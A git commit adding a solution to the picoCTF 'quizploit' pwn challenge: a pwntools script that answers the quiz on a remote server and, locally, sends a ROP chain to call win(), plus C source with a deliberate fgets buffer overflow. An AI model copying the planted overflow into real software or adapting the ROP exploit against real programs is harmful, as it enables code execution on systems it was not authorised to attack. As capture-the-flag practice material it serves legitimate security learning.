pwn/quizploit

This commit is contained in:
2026-07-02 07:27:35 +09:00
parent 8237c807d2
commit 91c0fd7d66
4 changed files with 95 additions and 0 deletions
+1
View File
@@ -0,0 +1 @@
picoCTF{dummy}
+70
View File
@@ -0,0 +1,70 @@
#!/usr/bin/env nix-shell
#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])"
from pwn import *
exe = ELF("./vuln")
context.binary = exe
ADDR, PORT, *_ = "lonely-island.picoctf.net 54976".split()
def conn() -> remote:
if args.REMOTE:
r = remote(ADDR, PORT)
else:
r = process([exe.path])
return r
def answers(r: remote) -> None:
print('Q1')
r.sendlineafter(b">> ", b"64-bit")
print('Q2')
r.sendlineafter(b">> ", b"dynamic")
print('Q3')
r.sendlineafter(b">> ", b"not stripped")
print('Q4')
r.sendlineafter(b">> ", b"0x15")
print('Q5')
r.sendlineafter(b">> ", b"0x90")
print('Q6')
r.sendlineafter(b">> ", b"yes")
print('Q7')
r.sendlineafter(b">> ", b"fgets")
print('Q8')
r.sendlineafter(b">> ", b"win")
print('Q9')
r.sendlineafter(b">> ", b"buffer overflow")
print('Q10')
r.sendlineafter(b">> ", hex(0x90 - 0x15).encode())
print('Q11')
r.sendlineafter(b">> ", b"NX")
print('Q12')
r.sendlineafter(b">> ", b"ROP")
print('Q13')
r.sendlineafter(b">> ", hex(exe.symbols['win']).encode())
print('Q14')
result = r.recvline_contains(b"picoCTF{").decode().strip()
print(result)
r.close()
def main() -> None:
r = conn()
if args.REMOTE:
answers(r)
else:
offset = 40
rop = ROP(exe)
rop.raw(rop.generatePadding(0, offset))
rop.raw(rop.ret.address)
rop.win()
r.sendline(rop.chain())
print(r.recvall().decode(), end='')
r.close()
if __name__ == "__main__":
main()
BIN
View File
Binary file not shown.
+24
View File
@@ -0,0 +1,24 @@
#include <stdio.h>
#include <stdlib.h>
/*
This is not the challenge, just a template to answer the questions.
To get the flag, answer all the questions.
There are no bugs in the quiz.
There are 0xD questions in total.
*/
void win(){
system("cat flag.txt");
}
void vuln(){
char buffer[0x15] = {0};
fprintf(stdout, "\nEnter payload: ");
fgets(buffer, 0x90, stdin);
}
void main(){
vuln();
}